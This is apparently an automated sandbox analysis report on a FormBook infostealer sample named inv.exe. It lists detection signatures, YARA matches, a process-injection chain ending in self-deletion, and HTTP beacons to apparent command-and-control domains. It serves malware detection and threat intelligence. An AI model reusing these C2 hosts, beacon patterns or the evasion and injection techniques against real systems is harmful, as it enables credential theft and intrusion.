
Analysis Report inv.exe

Overview

General Information

Sample Name:inv.exe
Analysis ID:323024
MD5:55f30220e8a613753f178fb901e5e5a6
SHA1:967f28afe30615264a38dd1ca7b6c818438c180f
SHA256:d8bd3b0fca3a390368fca5b01235e11176b46216b220b79c5548cf63979598c9

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • inv.exe (PID: 5764 cmdline: 'C:\Users\user\Desktop\inv.exe' MD5: 55F30220E8A613753F178FB901E5E5A6)
    • conhost.exe (PID: 5752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • inv.exe (PID: 4512 cmdline: C:\Users\user\Desktop\inv.exe MD5: 55F30220E8A613753F178FB901E5E5A6)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • systray.exe (PID: 6336 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 1373D481BE4C8A6E5F5030D2FB0A0C68)
          • cmd.exe (PID: 6716 cmdline: /c del 'C:\Users\user\Desktop\inv.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000002.00000002.283524182.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000002.00000002.283524182.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.283524182.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18419:$sqlite3step: 68 34 1C 7B E1
  • 0x1852c:$sqlite3step: 68 34 1C 7B E1
  • 0x18448:$sqlite3text: 68 38 2A 90 C5
  • 0x1856d:$sqlite3text: 68 38 2A 90 C5
  • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.1315254227.0000000000EA0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000002.1315254227.0000000000EA0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
16 entries in total; only the first are listed here.

Unpacked PEs

Source | Rule | Description | Author | Strings
2.2.inv.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.inv.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.inv.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17619:$sqlite3step: 68 34 1C 7B E1
  • 0x1772c:$sqlite3step: 68 34 1C 7B E1
  • 0x17648:$sqlite3text: 68 38 2A 90 C5
  • 0x1776d:$sqlite3text: 68 38 2A 90 C5
  • 0x1765b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17783:$sqlite3blob: 68 53 D8 7F 8C
0.2.inv.exe.970000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.inv.exe.970000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x51cf0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x51f6a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x5da8d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x5d579:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x5db8f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x5dd07:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x52982:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x5c7f4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x5367b:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x638ff:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x64902:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4 entries in total; only the first are listed here.

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: inv.exe | Avira: detected
Multi AV Scanner detection for submitted file
Source: inv.exe | Virustotal: Detection: 42%
Source: inv.exe | ReversingLabs: Detection: 67%
Yara detected FormBook
Source: Yara match | File source: 00000002.00000002.283524182.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1315254227.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1314348434.0000000000730000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.244233732.00000000009B8000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.283891864.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.283912769.0000000001410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1315337696.0000000000ED0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.2.inv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.inv.exe.970000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.inv.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: inv.exe | Joe Sandbox ML: detected
Source: 2.2.inv.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_009929D4 FindFirstFileExW,
Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_00992D90 FindFirstFileExW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_009929D4 FindFirstFileExW,
Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_00992D90 FindFirstFileExW,FindNextFileW,FindClose,
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\inv.exe | Code function: 4x nop then pop esi
Source: C:\Users\user\Desktop\inv.exe | Code function: 4x nop then pop ebx
Source: C:\Users\user\Desktop\inv.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\inv.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.7:49756
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.7:49759
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.74:80 -> 192.168.2.7:49761
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.7:49762
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.7:49763
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.7:49770
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.7:49772
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.7:49778
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.7:49780
HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=EYQ3CpWwSh2vHAFpwX7bfYNErBh8XjfonzY2Qz/ZEHgGxbW9TOQUf247lcv8UYdItcFHYpJ3ZA== HTTP/1.1 | Host: www.azery.site | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /hko6/?rL0=7JP9a7+0OyyDCtwY4BBiZHxvOcjmT/EmGsy/Rg5QxlKunDSy+zY41kj2/fIUtC9fXZTQqxticw==&3f_X=Q2J8lT4hKB4 HTTP/1.1 | Host: www.fittcycleacademy.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=/LbTQbSxfycNpyBkUl28ip4ahz0503SiTQiCvhPHWMRp7RgREL83brTbc+Xp5Y7hhpZ940oONw== HTTP/1.1 | Host: www.mycapecoralhomevalue.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /hko6/?rL0=EcalOYSyHuIWNe0yBiyzQnDoyWnQ8AXmuso6y7H91Y9cmoRSZtclvU9o5GCKwGOmvOmDBOYeyw==&3f_X=Q2J8lT4hKB4 HTTP/1.1 | Host: www.nextgenmemorabilia.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=tXOddRziBZnyKXnXE9Kw2rrsPuH0SCZGoRNpDj1avThKGPBCs+LEjAOKKARNXpDVSdN5zM8g6w== HTTP/1.1 | Host: www.bitcoincandy.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /hko6/?rL0=lnnZpxegrJKzTox397oQ7hMdCzz828WEhmoqeuNRxe7x8IdLeLrXs8RcdM6azEYnfszPY9qEDw==&3f_X=Q2J8lT4hKB4 HTTP/1.1 | Host: www.nairobi-paris.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=aHVAadkazLcgpN8DfnkezNpyp51CrlFhObeUx/sqQ/l2/vvbNLM2LhcZi7UhlF8eqCKPkpMthw== HTTP/1.1 | Host: www.multitask-improvements.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=unPaIt4Wrr/MPjhCprV+jqsEzE7JishdMJKNe650ko6TMe0TVWcSrCraL7NT+TIMSrZljLZXYg== HTTP/1.1 | Host: www.affiliateclubindia.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /hko6/?rL0=8oU9gQhEu+N8eeM1Y6MoxEZjlYuMVxPKauIzdp9CFrmDAuxODTg/6eGUiPSS+vrDP6XYMoMbRg==&3f_X=Q2J8lT4hKB4 HTTP/1.1 | Host: www.chartershome.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+2P6aSZa1OhuyBgZWg== HTTP/1.1 | Host: www.nationshiphop.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /hko6/?rL0=leTXDjYcUtkTOBo/XywC86s6NVsozqkX2a5kzyiD11BblheudN5U1IiLvUCvh9+vkOfDF9tr1A==&3f_X=Q2J8lT4hKB4 HTTP/1.1 | Host: www.cfmfair.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /hko6/?rL0=Z5wXWFR67775H9FWfAIDVOfBSfPNRfbmpsgUF7EF+miwYEgbR5wCg8jOIALgj8zBbklAwevO+Q==&3f_X=Q2J8lT4hKB4 HTTP/1.1 | Host: www.skinnerttc.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View | IP Address: 81.88.57.68
Source: Joe Sandbox View | IP Address: 34.102.136.180
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: EGIHOSTINGUS
Source: Joe Sandbox View | ASN Name: SOFTLAYERUS
Source: Joe Sandbox View | ASN Name: REGISTER-ASIT
Source: unknown | DNS traffic detected: queries for: g.msn.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 26 Nov 2020 07:25:10 GMT | Server: Apache | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 6b 6f 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hko6/ was not found on this server.</p></body></html>
Source: systray.exe, 00000005.00000002.1317017162.00000000051FF000.00000004.00000001.sdmp | String found in binary or memory: http://code.jquery.com/jquery-3.3.1.min.js
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.260102956.0000000006840000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000002.00000002.283524182.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1315254227.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1314348434.0000000000730000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.244233732.00000000009B8000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.283891864.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.283912769.0000000001410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1315337696.0000000000ED0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.2.inv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.inv.exe.970000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.inv.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000002.283524182.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.283524182.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.1315254227.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.1315254227.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.1314348434.0000000000730000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.1314348434.0000000000730000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.244233732.00000000009B8000.00000004.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.244233732.00000000009B8000.00000004.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.283891864.00000000013E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.283891864.00000000013E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.283912769.0000000001410000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.283912769.0000000001410000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.1315337696.0000000000ED0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.1315337696.0000000000ED0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.inv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.inv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.inv.exe.970000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.inv.exe.970000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.inv.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.inv.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_00971120 LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetConsoleWindow,ShowWindow,LoadLibraryA,RpcMgmtEpEltInqBegin,NtCreateSection,NtMapViewOfSection,CloseHandle,CallWindowProcW,
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_0041A060 NtClose,
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_0041A110 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_00419F30 NtCreateFile,
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_00419FE0 NtReadFile,
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_0041A08A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_00419FDA NtReadFile,
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_00419FDC NtReadFile,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048495D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04849540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048496D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048496E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04849650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04849660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04849780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04849FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04849710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04849840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04849860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048499A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04849910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04849A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_048495F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_04849520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 5_2_0484AD30 NtSetContextThread,
